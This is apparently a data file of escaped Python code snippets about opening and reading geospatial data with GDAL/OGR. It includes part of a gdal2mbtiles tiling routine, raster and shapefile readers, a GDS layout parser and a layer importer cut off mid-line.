self.options.tile_format == \"jpeg\":\n init_dest = [255,255,255]\n else:\n init_dest = None\n\n #\n # Here we should have RGBA input dataset opened in self.in_ds\n #\n\n if self.options.verbose:\n print \"Preprocessed file:\", \"( %sP x %sL - %s bands)\" % (self.in_ds.RasterXSize, self.in_ds.RasterYSize, self.in_ds.RasterCount)\n\n # Spatial Reference System of the input raster\n\n\n self.in_srs = None\n\n if self.options.s_srs:\n self.in_srs = osr.SpatialReference()\n self.in_srs.SetFromUserInput(self.options.s_srs)\n self.in_srs_wkt = self.in_srs.ExportToWkt()\n else:\n self.in_srs_wkt = self.in_ds.GetProjection()\n if not self.in_srs_wkt and self.in_ds.GetGCPCount() != 0:\n self.in_srs_wkt = self.in_ds.GetGCPProjection()\n if self.in_srs_wkt:\n self.in_srs = osr.SpatialReference()\n self.in_srs.ImportFromWkt(self.in_srs_wkt)\n #elif self.options.profile != 'raster':\n # self.error(\"There is no spatial reference system info included in the input file.\",\"You should run gdal2mbtiles with --s_srs EPSG:XXXX or similar.\")\n\n # Spatial Reference System of tiles\n\n self.out_srs = osr.SpatialReference()\n\n if self.options.profile == 'mercator':\n self.out_srs.ImportFromEPSG(900913)\n elif self.options.profile in ('geodetic', 'gearth', 'garmin'):\n self.out_srs.ImportFromEPSG(4326)\n else:\n self.out_srs = self.in_srs\n\n # Are the reference systems the same? Reproject if necessary.\n\n self.out_ds = None\n\n if self.options.profile in ('mercator', 'geodetic', 'gearth', 'garmin'):\n\n if (self.in_ds.GetGeoTransform() == (0.0, 1.0, 0.0, 0.0, 0.0, 1.0)) and (self.in_ds.GetGCPCount() == 0):\n self.error(\"There is no georeference - neither affine transformation (worldfile) nor GCPs. You can generate only 'raster' profile tiles.\",\n \"Either gdal2mbtiles with parameter -p 'raster' or use another GIS software for georeference e.g. 
gdal_transform -gcp / -a_ullr / -a_srs\")\n\n if self.in_srs:\n\n if (self.in_srs.ExportToProj4() != self.out_srs.ExportToProj4()) or (self.in_ds.GetGCPCount() != 0):\n\n # Generation of VRT dataset in tile projection, default 'nearest neighbour' warping\n self.out_ds = gdal.AutoCreateWarpedVRT( self.in_ds, self.in_srs_wkt, self.out_srs.ExportToWkt() )\n\n # TODO: HIGH PRIORITY: Correction of AutoCreateWarpedVRT according the max zoomlevel for correct direct warping!!!\n\n if self.options.verbose:\n print \"Warping of the raster by AutoCreateWarpedVRT (result saved into 'tiles.vrt')\"\n self.out_ds.GetDriver().CreateCopy(\"tiles.vrt\", self.out_ds)\n\n # Note: self.in_srs and self.in_srs_wkt contain still the non-warped reference system!!!\n\n # Correction of AutoCreateWarpedVRT for NODATA values\n if self.in_nodata != []:\n import tempfile\n tempfilename = tempfile.mktemp('-gdal2mbtiles.vrt')\n self.out_ds.GetDriver().CreateCopy(tempfilename, self.out_ds)\n # open as a text file\n s = open(tempfilename).read()\n # Add the warping options\n s = s.replace(\"\"\"<GDALWarpOptions>\"\"\",\"\"\"<GDALWarpOptions>\n <Option name=\"UNIFIED_SRC_NODATA\">YES</Option>\n <Option name=\"INIT_DEST\">NO_DATA</Option>\"\"\")\n # replace BandMapping tag for NODATA bands....\n if init_dest is None:\n dstnodata = self.in_nodata\n else:\n dstnodata = init_dest\n for i in range(len(self.in_nodata)):\n s = s.replace(\"\"\"<BandMapping src=\"%i\" dst=\"%i\"/>\"\"\" % ((i+1),(i+1)),\"\"\"<BandMapping src=\"%i\" dst=\"%i\">\n <SrcNoDataReal>%i</SrcNoDataReal>\n <SrcNoDataImag>0</SrcNoDataImag>\n <DstNoDataReal>%i</DstNoDataReal>\n <DstNoDataImag>0</DstNoDataImag>\n </BandMapping>\"\"\" % ((i+1), (i+1), self.in_nodata[i], dstnodata[i]))\n # save the corrected VRT\n open(tempfilename,\"w\").write(s)\n # open by GDAL as self.out_ds\n self.out_ds = gdal.Open(tempfilename) #, gdal.GA_ReadOnly)\n # delete the temporary file\n os.unlink(tempfilename)\n\n # set NODATA_VALUE metadata\n self.out_ds.SetMetadataItem('NODATA_VALUES','%s' % \" \".join(str(int(f)) for f in self.in_nodata))\n\n if self.options.verbose:\n print \"Modified warping result saved into 'tiles1.vrt'\"\n open(\"tiles1.vrt\",\"w\").write(s)\n\n # -----------------------------------\n # Correction of AutoCreateWarpedVRT for Mono (1 band) and RGB (3 bands) files without NODATA:\n # equivalent of gdalwarp -dstalpha\n elif self.in_nodata == [] and self.out_ds.RasterCount in (1,3):\n import tempfile\n tempfilename = tempfile.mktemp('-gdal2mbtiles.vrt')\n self.out_ds.GetDriver().CreateCopy(tempfilename, self.out_ds)\n # open as a text file\n s = open(tempfilename).read()\n # Add the warping options\n s = s.replace(\"\"\"<BlockXSize>\"\"\",\"\"\"<VRTRasterBand dataType=\"Byte\" band=\"%i\" subClass=\"VRTWarpedRasterBand\">\n <ColorInterp>Alpha</ColorInterp>\n </VRTRasterBand>\n <BlockXSize>\"\"\" % (self.out_ds.RasterCount + 1))\n s = s.replace(\"\"\"</GDALWarpOptions>\"\"\", \"\"\"<DstAlphaBand>%i</DstAlphaBand>\n </GDALWarpOptions>\"\"\" % (self.out_ds.RasterCount + 1))\n if init_dest is None:\n init_dest_str = \"0\"\n else:\n init_dest_str = \",\".join(str(f) for f in init_dest)\n s = s.replace(\"\"\"</WorkingDataType>\"\"\", \"\"\"</WorkingDataType>\n <Option name=\"INIT_DEST\">%s</Option>\"\"\" % init_dest_str)\n # save the corrected VRT\n open(tempfilename,\"w\").write(s)\n # open by GDAL as self.out_ds\n self.out_ds = gdal.Open(tempfilename) #, gdal.GA_ReadOnly)\n # delete the temporary file\n os.unlink(tempfilename)\n\n if self.options.verbose:\n print 
\"Modified -dstalpha warping result saved into 'tiles1.vrt'\"\n open(\"tiles1.vrt\",\"w\").write(s)\n\n elif init_dest is not None:\n import tempfile\n tempfilename = tempfile.mktemp('-gdal2mbtiles.vrt')\n self.out_ds.GetDriver().CreateCopy(tempfilename, self.out_ds)\n # open as a text file\n s = open(tempfilename).read()\n # Add the warping options\n s = s.replace(\"\"\"</WorkingDataType>\"\"\", \"\"\"</WorkingDataType>\n <Option name=\"INIT_DEST\">%s</Option>\"\"\" % \",\".join(str(f) for f in init_dest))\n # save the corrected VRT\n open(tempfilename,\"w\").write(s)\n # open by GDAL as self.out_ds\n self.out_ds = gdal.Open(tempfilename) #, gdal.GA_ReadOnly)\n # delete the temporary file\n os.unlink(tempfilename)\n\n if self.options.verbose:\n print \"Modified warping result saved into 'tiles1.vrt'\"\n open(\"tiles1.vrt\",\"w\").write(s)\n\n # For raster with 4-bands: 4th unknown band set to alpha\n if (self.out_ds.RasterCount == 4\n and self.out_ds.GetRasterBand(4).GetRasterColorInterpretation() == gdal.GCI_Undefined):\n self.out_ds.GetRasterBand(4).SetRasterColorInterpretation(gdal.GCI_AlphaBand)\n\n s = '''\n '''\n\n else:\n self.error(\"Input file has unknown SRS.\", \"Use --s_srs ESPG:xyz (or similar) to provide source reference system.\" )\n\n if self.out_ds and self.options.verbose:\n print \"Projected file:\", \"tiles.vrt\", \"( %sP x %sL - %s bands)\" % (self.out_ds.RasterXSize, self.out_ds.RasterYSize, self.out_ds.RasterCount)\n\n if not self.out_ds:\n self.out_ds = self.in_ds\n\n #\n # Here we should have a raster (out_ds) in the correct Spatial Reference system\n #\n\n # KML test\n self.isepsg4326 = False\n srs4326 = osr.SpatialReference()\n srs4326.ImportFromEPSG(4326)\n if self.out_srs and srs4326.ExportToProj4() == self.out_srs.ExportToProj4():\n self.kml = True\n self.isepsg4326 = True\n if self.options.verbose:\n print \"KML autotest OK!\"\n\n # Read the georeference\n\n self.out_gt = self.out_ds.GetGeoTransform()\n\n #originX, originY = self.out_gt[0], self.out_gt[3]\n #pixelSize = self.out_gt[1] # = self.out_gt[5]\n\n # Test the size of the pixel\n\n # MAPTILER - COMMENTED\n #if self.out_gt[1] != (-1 * self.out_gt[5]) and self.options.profile != 'raster':\n # TODO: Process corectly coordinates with are have swichted Y axis (display in OpenLayers too)\n #self.error(\"Size of the pixel in the output differ for X and Y axes.\")\n\n # Report error in case rotation/skew is in geotransform (possible only in 'raster' profile)\n if (self.out_gt[2], self.out_gt[4]) != (0,0):\n self.error(\"Georeference of the raster contains rotation or skew. Such raster is not supported. 
Please use gdalwarp first.\")\n # TODO: Do the warping in this case automaticaly\n\n #\n # Here we expect: pixel is square, no rotation on the raster\n #\n\n # Output Bounds - coordinates in the output SRS\n self.ominx = self.out_gt[0]\n self.omaxx = self.out_gt[0]+self.out_ds.RasterXSize*self.out_gt[1]\n self.omaxy = self.out_gt[3]\n self.ominy = self.out_gt[3]-self.out_ds.RasterYSize*self.out_gt[1]\n # Note: maybe round(x, 14) to avoid the gdal_translate behaviour, when 0 becomes -1e-15\n # user defined bounds to extract - coordinates in the output SRS\n if self.options.te_bounds != '':\n if self.te_minx >= self.ominx and self.te_minx <= self.omaxx:\n if self.te_maxx >= self.ominx and self.te_maxx <= self.omaxx:\n if self.te_miny >= self.ominy and self.te_miny <= self.omaxy:\n if self.te_maxy >= self.ominy and self.te_maxy <= self.omaxy:\n # replace only if inside the read bounds\n self.ominx = self.te_minx\n self.omaxx = self.te_maxx\n self.ominy = self.te_miny\n self.omaxy = self.te_maxy\n if self.options.verbose:\n print \"User defined Bounds (output srs) have been set:\", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy\n\n if self.options.verbose:\n print \"Bounds (output srs):\", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy\n\n if self.options.mbtiles:\n self.options.profile = 'mercator'\n if self.options.profile == 'mercator':\n self.mercator = GlobalMercator(self.options.tms_osm) # from globalmaptiles.py\n\n #\n # Calculating ranges for tiles in different zoom levels\n #\n\n # Function which generates SWNE in LatLong for given tile\n self.tileswne = self.mercator.TileLatLonBounds\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = range(0,32)\n for tz in range(0, 32):\n tminx, tminy = self.mercator.MetersToTile( self.ominx, self.ominy, tz )\n tmaxx, tmaxy = self.mercator.MetersToTile( self.omaxx, self.omaxy, tz )\n # crop tiles extending world limits (+-180,+-90)\n tminx, tminy = max(0, tminx), max(0, tminy)\n tmaxx, tmaxy = min(2**tz-1, tmaxx), min(2**tz-1, tmaxy)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # TODO: Maps crossing 180E (Alaska?)\n\n # Get the minimal zoom level (map covers area equivalent to one tile)\n if self.tminz == None:\n self.tminz = self.mercator.ZoomForPixelSize( self.out_gt[1] * max( self.out_ds.RasterXSize, self.out_ds.RasterYSize) / float(self.tilesize) )\n\n # Get the maximal zoom level (closest possible zoom level up on the resolution of raster)\n if self.tmaxz == None:\n self.tmaxz = self.mercator.ZoomForPixelSize( self.out_gt[1] )\n\n if self.options.verbose:\n print \"Bounds (latlong):\", self.mercator.MetersToLatLon( self.ominx, self.ominy), self.mercator.MetersToLatLon( self.omaxx, self.omaxy)\n print 'MinZoomLevel:', self.tminz\n print \"MaxZoomLevel:\", self.tmaxz, \"(\", self.mercator.Resolution( self.tmaxz ),\")\"\n\n # this must be call befor ImageOutput is called (self.output may be changed)\n if self.options.mbtiles:\n if not self.mbtiles_db:\n self.mbtiles_setup(1);\n\n # Instantiate image output.\n self.image_output = ImageOutput(self.options.tile_format, self.out_ds, self.tilesize,\n self.options.resampling, init_dest, self.output,\n self.options.verbose,self.options.mbtiles)\n if self.options.profile == 'geodetic':\n\n self.geodetic = GlobalGeodetic() # from globalmaptiles.py\n\n # Function which generates SWNE in LatLong for given tile\n self.tileswne = self.geodetic.TileLatLonBounds\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax 
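# Minimal sketch (standard spherical-mercator formulas; GlobalMercator in
# globalmaptiles.py implements the same math): what MetersToTile and
# ZoomForPixelSize compute for the per-zoom tile-range table built below.
import math

TILESIZE = 256
INITIAL_RESOLUTION = 2 * math.pi * 6378137 / TILESIZE  # metres/pixel at z=0
ORIGIN_SHIFT = 2 * math.pi * 6378137 / 2.0

def resolution(zoom):
    return INITIAL_RESOLUTION / (2 ** zoom)

def zoom_for_pixel_size(pixel_size):
    # Maximal scale-down zoom of the pyramid closest to pixel_size.
    for z in range(30):
        if pixel_size > resolution(z):
            return max(z - 1, 0)
    return 29  # pixel_size is finer than any precomputed level

def meters_to_tile(mx, my, zoom):
    res = resolution(zoom)
    px = (mx + ORIGIN_SHIFT) / res
    py = (my + ORIGIN_SHIFT) / res
    return (int(math.ceil(px / float(TILESIZE))) - 1,
            int(math.ceil(py / float(TILESIZE))) - 1)

def tile_range(ominx, ominy, omaxx, omaxy, zoom):
    tminx, tminy = meters_to_tile(ominx, ominy, zoom)
    tmaxx, tmaxy = meters_to_tile(omaxx, omaxy, zoom)
    # Crop tiles extending the world limits, as the loop above does.
    return (max(0, tminx), max(0, tminy),
            min(2 ** zoom - 1, tmaxx), min(2 ** zoom - 1, tmaxy))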
= range(0,32)\n for tz in range(0, 32):\n tminx, tminy = self.geodetic.LatLonToTile( self.ominx, self.ominy, tz )\n tmaxx, tmaxy = self.geodetic.LatLonToTile( self.omaxx, self.omaxy, tz )\n # crop tiles extending world limits (+-180,+-90)\n tminx, tminy = max(0, tminx), max(0, tminy)\n tmaxx, tmaxy = min(2**(tz+1)-1, tmaxx), min(2**tz-1, tmaxy)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # TODO: Maps crossing 180E (Alaska?)\n\n # Get the maximal zoom level (closest possible zoom level up on the resolution of raster)\n if self.tminz == None:\n self.tminz = self.geodetic.ZoomForPixelSize( self.out_gt[1] * max( self.out_ds.RasterXSize, self.out_ds.RasterYSize) / float(self.tilesize) )\n\n # Get the maximal zoom level (closest possible zoom level up on the resolution of raster)\n if self.tmaxz == None:\n self.tmaxz = self.geodetic.ZoomForPixelSize( self.out_gt[1] )\n\n if self.options.verbose:\n print \"Bounds (latlong):\", self.ominx, self.ominy, self.omaxx, self.omaxy\n\n if self.options.profile in ('raster', 'gearth', 'garmin'):\n\n log2 = lambda x: math.log10(x) / math.log10(2) # log2 (base 2 logarithm)\n\n self.nativezoom = int(max( math.ceil(log2(self.out_ds.RasterXSize/float(self.tilesize))),\n math.ceil(log2(self.out_ds.RasterYSize/float(self.tilesize)))))\n\n if self.options.verbose:\n print \"Native zoom of the raster:\", self.nativezoom\n\n # Get the minimal zoom level (whole raster in one tile)\n if self.tminz == None:\n self.tminz = 0\n\n # Get the maximal zoom level (native resolution of the raster)\n if self.tmaxz == None:\n self.tmaxz = self.nativezoom\n\n # Garmin has maximally 100 tiles - lower the tmaxz if necessary\n if self.options.profile == 'garmin':\n tno = math.ceil(self.out_ds.RasterXSize / self.tilesize) * math.ceil(self.out_ds.RasterYSize / self.tilesize)\n for tz in range(self.tmaxz, 1, -1):\n if tno > 100:\n tno /= 4\n self.tmaxz -= 1\n print \"Warning: GARMIN has a limit 100 tiles per device: lowering the max zoom level to:\", self.tmaxz\n else:\n continue\n\n # Force only one zoom level for the 'garmin' tile profile\n if self.options.profile == 'garmin':\n self.tminz = self.tmaxz\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = range(0, self.tmaxz+1)\n self.tsize = range(0, self.tmaxz+1)\n for tz in range(0, self.tmaxz+1):\n tsize = 2.0**(self.nativezoom-tz)*self.tilesize\n tminx, tminy = 0, 0\n tmaxx = int(math.ceil( self.out_ds.RasterXSize / tsize )) - 1\n tmaxy = int(math.ceil( self.out_ds.RasterYSize / tsize )) - 1\n self.tsize[tz] = math.ceil(tsize)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # Function which generates SWNE in LatLong for given tile\n if self.kml and self.in_srs_wkt:\n self.ct = osr.CoordinateTransformation(self.in_srs, srs4326)\n def rastertileswne(x,y,z):\n pixelsizex = (2**(self.nativezoom-z) * self.out_gt[1]) # X-pixel size in level\n pixelsizey = (2**(self.nativezoom-z) * self.out_gt[5]) # Y-pixel size in level (usually -1*pixelsizex)\n west = self.out_gt[0] + x*self.tilesize*pixelsizex\n east = west + self.tilesize*pixelsizex\n south = self.ominy + y*self.tilesize*pixelsizex\n north = south + self.tilesize*pixelsizex\n if not self.isepsg4326:\n # Transformation to EPSG:4326 (WGS84 datum)\n west, south = self.ct.TransformPoint(west, south)[:2]\n east, north = self.ct.TransformPoint(east, north)[:2]\n return south, west, north, east\n\n self.tileswne = rastertileswne\n else:\n self.tileswne = lambda x, y, z: (0,0,0,0)", "def open(*args, **kwargs):\n return 
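# Minimal sketch (illustrative): for the 'raster'/'gearth'/'garmin' profiles
# above, the native zoom is the smallest pyramid level whose tile grid covers
# the raster, and each lower level halves the resolution.
import math

def native_zoom(xsize, ysize, tilesize=256):
    log2 = lambda v: math.log10(v) / math.log10(2)
    return int(max(math.ceil(log2(xsize / float(tilesize))),
                   math.ceil(log2(ysize / float(tilesize)))))

def raster_tile_range(xsize, ysize, zoom, nativezoom, tilesize=256):
    tsize = 2.0 ** (nativezoom - zoom) * tilesize  # raster pixels per tile
    return (0, 0,
            int(math.ceil(xsize / tsize)) - 1,
            int(math.ceil(ysize / tsize)) - 1)

# Example: a 10000 x 8000 pixel raster has native zoom 6 and a
# 40 x 32 tile grid at that level.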
GDALFileTileSource(*args, **kwargs)", "def open_shapefile(file_path):\n datasource = ogr.Open(file_path)\n layer = datasource.GetLayerByIndex(0)\n print(\"Opening {}\".format(file_path))\n print(\"Number of features: {}\".format(layer.GetFeatureCount()))\n return datasource", "def get_source(self, file_path, driver=None):\n if driver:\n # Use a driver to open the file\n driver = ogr.GetDriverByName(driver)\n return driver.Open(file_path, 0)\n return gdal.Open(file_path, GA_ReadOnly)", "def gdal_read_geotiff_file(sFilename_in):\n \n if os.path.exists(sFilename_in):\n pass\n else:\n print('The file does not exist!')\n return\n\n sDriverName='GTiff'\n pDriver = gdal.GetDriverByName(sDriverName) \n\n if pDriver is None:\n print (\"%s pDriver not available.\\n\" % sDriverName)\n else:\n print (\"%s pDriver IS available.\\n\" % sDriverName) \n\n pDataset = gdal.Open(sFilename_in, gdal.GA_ReadOnly)\n\n if pDataset is None:\n print(\"Couldn't open this file: \" + sFilename_in)\n sys.exit(\"Try again!\")\n else: \n pProjection = pDataset.GetProjection()\n\n pDataset.GetMetadata()\n \n ncolumn = pDataset.RasterXSize\n nrow = pDataset.RasterYSize\n nband = pDataset.RasterCount\n\n pGeotransform = pDataset.GetGeoTransform()\n dOriginX = pGeotransform[0]\n dOriginY = pGeotransform[3]\n dPixelWidth = pGeotransform[1]\n pPixelHeight = pGeotransform[5]\n\n pBand = pDataset.GetRasterBand(1)\n\n # Data type of the values\n gdal.GetDataTypeName(pBand.DataType)\n # Compute statistics if needed\n if pBand.GetMinimum() is None or pBand.GetMaximum() is None:\n pBand.ComputeStatistics(0)\n\n dMissing_value = pBand.GetNoDataValue()\n \n aData_out = pBand.ReadAsArray(0, 0, ncolumn, nrow)\n \n #we will use one of them to keep the consistency\n pSpatial_reference = osr.SpatialReference(wkt=pProjection)\n \n\n pDataset = None\n pBand = None \n pBand = None\n\n return aData_out, dPixelWidth, dOriginX, dOriginY, nrow, ncolumn, dMissing_value, pGeotransform, pProjection, pSpatial_reference", "def read_gdal_projection(dataset):\n wkt = dataset.GetProjection()\n srs = osr.SpatialReference()\n srs.ImportFromWkt(wkt)\n # src = None\n return srs", "def fromfile(file_h):\n # If given a file name, get a real handle.\n if isinstance(file_h, str):\n with open(file_h, \"rb\") as file_h:\n buf = file_h.read()\n else:\n buf = file_h.read()\n\n # If we get WKB need to wrap in memoryview(), so run through regexes.\n if isinstance(buf, bytes):\n try:\n decoded = buf.decode()\n except UnicodeDecodeError:\n pass\n else:\n if wkt_regex.match(decoded) or hex_regex.match(decoded):\n return GEOSGeometry(decoded)\n else:\n return GEOSGeometry(buf)\n\n return GEOSGeometry(memoryview(buf))", "def open(cstr, layername=None, layersql=None, extent=None, sql_dialect=None, open_for_update=False):\n ds = ogr.Open(cstr, update=open_for_update)\n if ds is None:\n raise Exception(\"Failed to open \" + cstr)\n if layersql is not None: # an sql statement will take precedence\n if extent is not None and EXTENT_WKT in layersql:\n wkt = \"'\" + extent_to_wkt(extent) + \"'\"\n layersql = layersql.replace(EXTENT_WKT, wkt)\n # restrict to ASCII encodable chars here -\n # don't know what the datasource\n # is precisely and ogr doesn't like unicode.\n layer = ds.ExecuteSQL(str(layersql), dialect=sql_dialect)\n elif layername is not None: # then a layername\n layer = ds.GetLayerByName(layername)\n else: # fallback - shapefiles etc, use first layer\n layer = ds.GetLayer(0)\n assert(layer is not None)\n\n return ds, layer", "def read_geojson(input_file):\n # Please 
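# Minimal sketch (assumes the GDAL Python bindings and NumPy; the helper name
# is illustrative): the pattern shared by the GeoTIFF readers in the nearby
# snippets -- open, read the first band, and mask the NoData value.
import numpy as np
from osgeo import gdal

def read_geotiff(path):
    ds = gdal.Open(path, gdal.GA_ReadOnly)
    if ds is None:
        raise IOError("Could not open %s" % path)
    band = ds.GetRasterBand(1)
    data = band.ReadAsArray(0, 0, ds.RasterXSize, ds.RasterYSize)
    nodata = band.GetNoDataValue()
    if nodata is not None:
        data = np.ma.masked_equal(data, nodata)
    return data, ds.GetGeoTransform(), ds.GetProjection()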
use the python json module (imported above)\n # to solve this one.\n with open(input_file,'r') as f:\n gj = json.load(f)\n return gj", "def read_geojson(input_file):\n # Please use the python json module (imported above)\n # to solve this one.\n with open(input_file,'r') as f:\n gj = json.load(f)\n return gj", "def open_raster_file(self):\n self.log('Opening raster file as GDALRaster.')\n\n # Open raster file\n self.dataset = GDALRaster(os.path.join(self.tmpdir, self.rastername), write=True)\n\n # Make sure nodata value is set from input\n self.hist_values = []\n self.hist_bins = []\n for i, band in enumerate(self.dataset.bands):\n if self.rasterlayer.nodata is not None:\n band.nodata_value = float(self.rasterlayer.nodata)\n\n # Create band metatdata object\n bandmeta = RasterLayerBandMetadata.objects.create(\n rasterlayer=self.rasterlayer,\n band=i,\n nodata_value=band.nodata_value,\n min=band.min,\n max=band.max\n )\n\n # Prepare numpy hist values and bins\n self.hist_values.append(numpy.array(bandmeta.hist_values))\n self.hist_bins.append(numpy.array(bandmeta.hist_bins))\n\n # Store original metadata for this raster\n meta = self.rasterlayer.metadata\n\n meta.uperleftx = self.dataset.origin.x\n meta.uperlefty = self.dataset.origin.y\n meta.width = self.dataset.width\n meta.height = self.dataset.height\n meta.scalex = self.dataset.scale.x\n meta.scaley = self.dataset.scale.y\n meta.skewx = self.dataset.skew.x\n meta.skewy = self.dataset.skew.y\n meta.numbands = len(self.dataset.bands)\n meta.srs_wkt = self.dataset.srs.wkt\n meta.srid = self.dataset.srs.srid\n\n meta.save()", "def readMap(fileName, fileFormat):\n # Open file for binary-reading\n mapFormat = gdal.GetDriverByName(fileFormat)\n mapFormat.Register()\n ds = gdal.Open(fileName)\n if ds is None:\n print 'Could not open ' + fileName + '. Something went wrong!! Shutting down'\n sys.exit(1)\n # Retrieve geoTransform info\n geotrans = ds.GetGeoTransform()\n originX = geotrans[0]\n originY = geotrans[3]\n resX = geotrans[1]\n resY = geotrans[5]\n cols = ds.RasterXSize\n rows = ds.RasterYSize\n x = linspace(originX+resX/2,originX+resX/2+resX*(cols-1),cols)\n y = linspace(originY+resY/2,originY+resY/2+resY*(rows-1),rows)\n # Retrieve raster\n RasterBand = ds.GetRasterBand(1) # there's only 1 band, starting from 1\n data = RasterBand.ReadAsArray(0,0,cols,rows)\n FillVal = RasterBand.GetNoDataValue()\n RasterBand = None\n ds = None\n return x, y, data, FillVal", "def read_gds(self,\n infile,\n units='skip',\n rename={},\n layers={},\n datatypes={},\n texttypes={}):\n self._references = []\n if isinstance(infile, basestring):\n infile = open(infile, 'rb')\n close = True\n else:\n close = False\n emitted_warnings = []\n record = self._read_record(infile)\n kwargs = {}\n create_element = None\n factor = 1\n cell = None\n while record is not None:\n # LAYER\n if record[0] == 0x0d:\n kwargs['layer'] = layers.get(record[1][0], record[1][0])\n # DATATYPE\n elif record[0] == 0x0e:\n kwargs['datatype'] = datatypes.get(record[1][0], record[1][0])\n # TEXTTYPE\n elif record[0] == 0x16:\n kwargs['texttype'] = texttypes.get(record[1][0], record[1][0])\n # XY\n elif record[0] == 0x10:\n kwargs['xy'] = factor * record[1]\n # WIDTH\n elif record[0] == 0x0f:\n kwargs['width'] = factor * abs(record[1][0])\n if record[1][0] < 0 and record[0] not in emitted_warnings:\n warnings.warn(\n \"[GDSPY] Paths with absolute width value are not \"\n \"supported. 
Scaling these paths will also scale \"\n \"their width.\",\n stacklevel=2)\n emitted_warnings.append(record[0])\n # ENDEL\n elif record[0] == 0x11:\n if create_element is not None:\n cell.add(create_element(**kwargs))\n create_element = None\n kwargs = {}\n # BOUNDARY\n elif record[0] == 0x08:\n create_element = self._create_polygon\n # PATH\n elif record[0] == 0x09:\n create_element = self._create_path\n # TEXT\n elif record[0] == 0x0c:\n create_element = self._create_label\n # SNAME\n elif record[0] == 0x12:\n kwargs['ref_cell'] = rename.get(record[1], record[1])\n # COLROW\n elif record[0] == 0x13:\n kwargs['columns'] = record[1][0]\n kwargs['rows'] = record[1][1]\n # STRANS\n elif record[0] == 0x1a:\n kwargs['x_reflection'] = ((int(record[1][0]) & 0x8000) > 0)\n if (int(record[1][0]) &\n 0x0006) and record[0] not in emitted_warnings:\n warnings.warn(\n \"[GDSPY] Absolute magnification or rotation of \"\n \"references is not supported. Transformations will \"\n \"be interpreted as relative.\",\n stacklevel=2)\n emitted_warnings.append(record[0])\n # MAG\n elif record[0] == 0x1b:\n kwargs['magnification'] = record[1][0]\n # ANGLE\n elif record[0] == 0x1c:\n kwargs['rotation'] = record[1][0]\n # SREF\n elif record[0] == 0x0a:\n create_element = self._create_reference\n # AREF\n elif record[0] == 0x0b:\n create_element = self._create_array\n # STRNAME\n elif record[0] == 0x06:\n name = rename.get(record[1], record[1])\n cell = Cell(name, exclude_from_current=True)\n self.cell_dict[name] = cell\n # STRING\n elif record[0] == 0x19:\n kwargs['text'] = record[1]\n # ENDSTR\n elif record[0] == 0x07:\n cell = None\n # UNITS\n elif record[0] == 0x03:\n if units == 'skip':\n factor = record[1][0]\n elif units == 'import':\n self.unit = record[1][1] / record[1][0]\n self.precision = record[1][1]\n factor = record[1][0]\n elif units == 'convert':\n factor = record[1][1] / self.unit\n else:\n raise ValueError(\"[GDSPY] units must be one of 'convert', \"\n \"'import' or 'skip'.\")\n # LIBNAME\n elif record[0] == 0x02:\n self.name = record[1]\n # PRESENTATION\n elif record[0] == 0x17:\n kwargs['anchor'] = GdsLibrary._import_anchors[int(record[1][0])\n & 0x000f]\n # PATHTYPE\n elif record[0] == 0x21:\n if record[1][0] > 2:\n if 0x21 not in emitted_warnings:\n warnings.warn(\n \"[GDSPY] Path ends with custom size are not \"\n \"supported.\",\n RuntimeWarning,\n stacklevel=2)\n emitted_warnings.append(0x21)\n else:\n kwargs['ends'] = record[1][0]\n # ENDLIB\n elif record[0] == 0x04:\n for ref in self._references:\n if ref.ref_cell in self.cell_dict:\n ref.ref_cell = self.cell_dict[ref.ref_cell]\n elif ref.ref_cell in current_library.cell_dict:\n ref.ref_cell = current_library.cell_dict[ref.ref_cell]\n # Not supported\n elif (record[0] not in emitted_warnings and\n record[0] not in GdsLibrary._unused_records):\n warnings.warn(\n \"[GDSPY] Record type {0} ({1:02X}) is not \"\n \"supported.\".format(GdsLibrary._record_name[record[0]],\n record[0]),\n RuntimeWarning,\n stacklevel=2)\n emitted_warnings.append(record[0])\n record = self._read_record(infile)\n if close:\n infile.close()\n return self", "def import_file(self, *args, **kwargs):\n filename = self.file\n self.completed_layers = []\n err = GdalErrorHandler()\n gdal.PushErrorHandler(err.handler)\n gdal.UseExceptions()\n configuration_options = kwargs.get('configuration_options', [{'index': 0}])\n\n # Configuration options should be a list at this point since the importer can process multiple layers in a\n # single import\n if 
isinstance(configuration_options, dict):\n configuration_options = [configuration_options]\n\n data, inspector = self.open_source_datastore(filename, *args, **kwargs)\n\n datastore_layers = inspector.describe_fields()\n\n if len(datastore_layers) == 0:\n logger.debug('No Dataset found')\n\n layers_info = []\n\n # Add index for any layers configured by name\n for layer_configuration in configuration_options:\n if 'layer_name' in layer_configuration:\n lookup = 'layer_name'\n elif 'index' in layer_configuration:\n lookup = 'index'\n else:\n lookup = None\n logger.debug('could not find lookup')\n continue\n\n for datastore_layer in datastore_layers:\n if datastore_layer.get(lookup) == layer_configuration.get(lookup):\n layer_configuration.update(datastore_layer)\n layers_info.append(layer_configuration)\n\n for layer_options in layers_info:\n if layer_options['raster']:\n \"\"\"\n File is a raster, we need to convert into optimized GeoTiff\n and skip any further testing or loading into target_store\n \"\"\"\n # Increment filename to make sure target doesn't exists\n filedir, filebase = os.path.split(filename)\n outfile = '%s.tif' % os.path.splitext(filebase)[0]\n fileout = increment_filename(os.path.join(RASTER_FILES, outfile))\n raster_import(layer_options['path'], fileout)\n self.completed_layers.append([fileout, layer_options])\n else:\n target_file, _ = self.open_target_datastore(self.target_store)\n target_create_options = []\n\n # Prevent numeric field overflow for shapefiles https://trac.osgeo.org/gdal/ticket/5241\n if target_file.GetDriver().GetName() == 'PostgreSQL':\n target_create_options.append('PRECISION=NO')\n\n layer_options['modified_fields'] = {}\n layer = data.GetLayer(layer_options.get('index'))\n layer_name = layer_options.get('name', layer.GetName().lower())\n layer_type = self.get_layer_type(layer, data)\n srs = layer.GetSpatialRef()\n\n if layer_name.lower() == 'ogrgeojson':\n try:\n layer_name = os.path.splitext(os.path.basename(filename))[0].lower()\n except IndexError:\n pass\n\n layer_name = launder(str(layer_name))\n\n # default the layer to 4326 if a spatial reference is not provided\n if not srs:\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(4326)\n\n # pass the srs authority code to handlers\n if srs.AutoIdentifyEPSG() == 